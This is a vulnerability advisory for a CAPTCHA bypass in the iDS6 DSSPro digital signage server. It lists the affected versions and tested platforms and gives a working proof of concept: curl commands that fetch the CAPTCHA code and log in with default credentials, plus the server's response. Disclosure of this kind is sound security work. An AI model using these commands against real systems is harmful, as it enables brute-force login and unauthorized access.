iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass  
Vendor: Guangzhou Yeroo Tech Co., Ltd.  
Product web page:  
Affected version: V6.2 B2014.12.12.1220  
V5.6 B2017.07.12.1757  
Summary: iDS6 Software's DSSPro network digital signage management  
system is a web-based server software solution for Windows.  
Desc: The CAPTCHA function for DSSPro is prone to a security bypass  
vulnerability that occurs in the CAPTCHA authentication routine. By  
requesting the autoLoginVerifyCode object an attacker can receive a  
JSON message code and successfully bypass the CAPTCHA-based authentication  
challenge and perform brute-force attacks.  
Tested on: Microsoft Windows XP  
Microsoft Windows 7  
Microsfot Windows Server 2008  
Microsoft Windows Server 2012  
Microsoft Windows 10  
Apache Tomcat/8.0.44  
Apache Tomcat/6.0.35  
Apache Axis/1.4  
MySQL 5.5.25  
Java 1.8.0  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2020-5607  
Advisory URL:  
Get CAPTCHA code:  
$ curl -i\!autoLoginVerifyCode -c cookies.txt  
Use CAPTCHA code:  
$ curl -i\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT  
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT  
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT  
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT  
Cache-Control: no-cache  
Pragma: no-cache  
Content-Type: application/x-json;charset=UTF-8  
Date: Tue, 21 Jul 2020 19:41:26 GMT  
Connection: close  
Content-Length: 16